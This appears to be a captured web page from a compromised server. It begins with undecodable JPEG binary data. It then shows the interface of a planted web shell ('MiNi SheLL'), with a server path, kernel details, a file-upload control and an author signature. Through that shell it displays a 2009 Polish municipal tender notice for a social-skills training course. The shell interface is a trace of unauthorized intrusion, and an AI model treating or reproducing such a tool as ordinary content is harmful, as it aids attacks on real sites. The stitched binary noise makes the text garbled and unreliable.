JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/217706-N-2009.html

<p class="kh_header"><b>Aleksandrów Kujawski: Zorganizowanie i przeprowadzenie szkolenia w zakresie: Kompetencji społecznych dla około 25 osób w ramach projektu systemowego Gminnego Ośrodka Pomocy Społecznej</b><br>
<b>Numer ogłoszenia: 217706 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Aleksandrów Kujawski , ul. Słowackiego 12, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2822031, 2822059 w. 37, faks 054 2822031, 2822059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.aleksandrowkuj.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia w zakresie: Kompetencji społecznych dla około 25 osób w ramach projektu systemowego Gminnego Ośrodka Pomocy Społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia obejmuje:
1  Zorganizowanie i przeprowadzenie szkolenia w zakresie: Kompetencji społecznych.
2 Kurs obejmuje grupę około 25 osób. 
Zamawiający zastrzega sobie możliwość zmiany  liczby osób uczestniczących w szkoleniu. Liczba przewidywanych osób może ulec zmianie.  
3 Kurs ma na celu zwiększenie:
1) kompetencji społecznych: 
- podniesienie samooceny, poczucia własnej wartości i motywacji, stworzenia uczestnikom szans powrotu do pełnego życia społecznego poprzez:
-	uświadomienie co to jest samowiedza i jak ją wykorzystać,
-	poznanie typu swoich potrzeb i zainteresowań,
-	uświadomienie swoich mocnych i słabych stron, diagnoza własnych zasobów,
-	określenie i uświadomienie sobie wyznaczonych wartości,
-	nabycie umiejętności komunikacyjnych i interpersonalnych,


-	identyfikację wartości życiowych, nabycie umiejętności zachowań asertywnych, radzenia sobie ze stresem i zachowaniami agresywnymi,
2) kompetencji zawodowych:
- poprzez zwiększenie poziomu kompetencji zawodowych uczestników, oraz zwiększenie szansy powrotu na rynek pracy, podniesienie umiejętności poruszania się po rynku pracy poprzez:
-	identyfikację wartości życiowych i wartości związanych z pracą,
-	zmianę sposobu myślenia o sobie i postrzegania siebie,
-	określenie swoich ograniczeń i oczekiwań w zakresie pracy zawodowej,
-	nabycie umiejętności napisania życiorysu (CV) i listu motywacyjnego,
-	podniesienie umiejętności związanych z poszukiwaniem pracy,
-	nabycie umiejętności autopromocji i autoprezentacji,
-	poznanie rynku pracy. 
4 Kurs powinien być przeprowadzony przez doświadczonego psychologa lub psychologa-terapeutę oraz doradcę zawodowego. Kadra dydaktyczna powinna posiadać uprawnienia do prowadzenia zajęć oraz praktykę w tym zakresie.
5 Szkolenie musi obejmować zakres wiadomości teoretycznych.
      Liczba godzin nauczania: zajęcia teoretyczne -  ok. 40 godzin.
6 Wykonawca zapewni uczestnikom kursu materiały szkoleniowe na czas trwania szkolenia.
Każdy uczestnik powinien otrzymać materiały niezbędne do robienia notatek (np. zeszyt, notatnik, długopis).
7 Wykonawca zapewni uczestnikom kursu w trakcie trwania szkolenia warunki pracy zgodne 
z przepisami bezpieczeństwa i higieny pracy.
8 Pomieszczenia, w których będą się odbywać zajęcia szkoleniowe powinny być przystosowane pod względem sanitarnym, przeciwpożarowym i bhp do prowadzenia szkoleń, dostosowane do liczby uczestników określonej w zamówieniu. Miejscem przeprowadzenia  szkolenia jest teren gminy Aleksandrów Kujawski.
Zajęcia powinny być prowadzone w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym:
- aparaturę audiowizualną,
- rzutnik pisma,
- tablica naścienna lub tablica informacyjna (foliowo-magnetyczna),
- biurka lub ławki oraz krzesła (na jednego uczestnika szkolenia musi przypadać jedno biurko lub ławka oraz jedno krzesło).
9 Wykonawca winien zabezpieczyć słuchaczom dostęp do materiałów tematycznie związanych 
z prezentowanym na zajęciach materiałem teoretycznym, w tym m. in.:
- zdjęć, plansz dydaktycznych oraz ilustracji,
- zestawów foliogramów.	
10 W ramach kursu Wykonawca zobowiązany jest do:
- zapewnienia kateringu dla uczestników, stosownie do liczby określonej w zamówieniu:
- 	3 przerwy kawowe, w tym:
gorąca kawa i herbata,
4 rodzaje ciast;
2 rodzaje soków, woda mineralna gazowana i niegazowana,
- serwis gastronomiczny (przygotowanie, nakrycie stołów, zastawa np. naczynia jednorazowego użytku oraz sprzątanie).
- zapewnienia każdemu z uczestników szkolenia materiałów szkoleniowych (podręcznik lub skrypt autorski prowadzącego zajęcia w postaci wydruku trwałego, kartki trawle złączone metodą bindowania). Materiały, o których mowa powyżej uczestnicy otrzymują na własność;
- sporządzić szczegółowy harmonogram zajęć, składający się z tematyki zajęć, imienny wykaz kadry dydaktycznej prowadzonej poszczególne zajęcia, godziny zajęć, dzienna liczba godzin szkolenia wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia 
i uzyskanie kwalifikacji, ankiety dla uczestników szkolenia, materiałów dydaktycznych., w celu przedstawienia Zamawiającemu do zaakceptowania przed zawarciem umowy na niniejsze zamówienie;
- sprawowania nadzoru nad frekwencją uczestników szkolenia;

- prowadzenie listy obecności uczestników szkolenia i przekazania jej Zamawiającemu;
- prowadzenia dziennika zajęć;
- wydania uczestnikom szkolenia zaświadczeń o udziale i ukończeniu szkolenia;

- prowadzenia rejestru wydanych zaświadczeń;
- opracowania ankiety ewaluacyjnej i przeprowadzenie ankiety ewaluacyjnej wśród uczestników szkolenia;
- przekazania Zamawiającemu listy potwierdzającej odbiór w/w zaświadczeń, kserokopii tych zaświadczeń, oryginałów list obecności, ankiet ewaluacyjnych oraz kompletu materiałów dydaktycznych;
- wyeksponowania logotypów PO KL, EFS oraz emblematów Unii Europejskiej zamieszczenia informacji o współfinansowaniu zadania ze środków EFS na materiałach dydaktycznych oraz 
w miejscach realizacji szkoleń;
- udokumentowania fotograficznego przebiegu szkoleń i przekazania materiałów na nośniku CD Zamawiającemu, niezwłocznie po zakończeniu szkoleń. Wykonawca wykona co najmniej 30 zdjęć z przebiegu szkoleń;
- realizacji merytorycznego programu (zapewnienia wykładowców i pomieszczenia do przeprowadzenia szkolenia, jak i również sprzętu do praktycznej nauki zawodu)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje konieczności wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy  spełniają     następujące warunki:
1 posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów
do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5 spełniają wszystkie warunki wynikające z punktu 12 Dokumenty i oświadczenia składające się na ofertę, 
6 wykażą się doświadczeniem w realizacji usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem co najmniej 2 usług szkoleniowych w kwocie nie mniejszej niż 10.000,00 zł brutto każda, usługom stanowiącym przedmiot zamówienia. 

Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia
w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w punkcie 12 SIWZ
(dla ofert wspólnych także w punkcie 13 SIWZ). Z treści załączonych dokumentów musi jednoznacznie wynikać, że powyższe warunki Wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy złożą dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału
w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
Niespełnienie chociażby jednego z warunków udziału z postępowania skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1  Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ,
2  Zaakceptowany wzór umowy  lub oświadczenie o akceptacji warunków umowy -załącznik nr 2 do  SIWZ,
3 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku składania oferty przez wykonawców występujących wspólnie, w/w dokument musi być złożony przez każdego wykonawcę);
4 Dokument potwierdzający, że Wykonawca jest zarejestrowany w Internetowej Bazie Ofert Szkoleniowych (www.inwestycjawkadry.pl); 
5 Wpis do rejestru instytucji szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
6 Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz
z informacjami na temat niezbędnych kwalifikacji, doświadczenia i wykształcenia do wykonania przedmiotu zamówienia (np. dyplomy, świadectwa, zaświadczenia, certyfikaty) - (załącznik nr 3 do SIWZ); 
7 Kopie dokumentów potwierdzających kwalifikacje i uprawnienia wykładowców i instruktorów
8 Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem co najmniej 2 usług szkoleniowych w kwocie nie mniejszej niż 10.000,00 zł brutto każda, usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorcy; do wykazu należy załączyć kopie dokumentów potwierdzających, że usługi zostały należycie wykonane, (załącznik nr 4);
9 Preliminarz kosztów, z którego wynika koszt całkowity szkolenia przypadający na jedną osobę oraz koszt osobogodziny(obliczenie ofertowej ceny zamówienia  - wartość do zapłaty przez Zamawiającego);
10 Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień publicznych i nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art.24 ust. 1, 2 prawa zamówień publicznych - załącznik nr 6 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - przedmiotem oceny będzie odległość w kilometrach  miejsca realizacji zamówienia jaką musi pokonać uczestnik kursu od AleksandrowaKujawskiego do miejs - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ug.aleksandrowkuj.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Aleksandrowie Kujawskim
ul. Słowackiego 12
87-700 Aleksandrów Kujawski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2009 godzina 10:00, miejsce: Urząd Gminy w Aleksandrowie Kujawskim
ul. Słowackiego 12
87-700 Aleksandrów Kujawski 
sekretariat (pokój nr 1).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com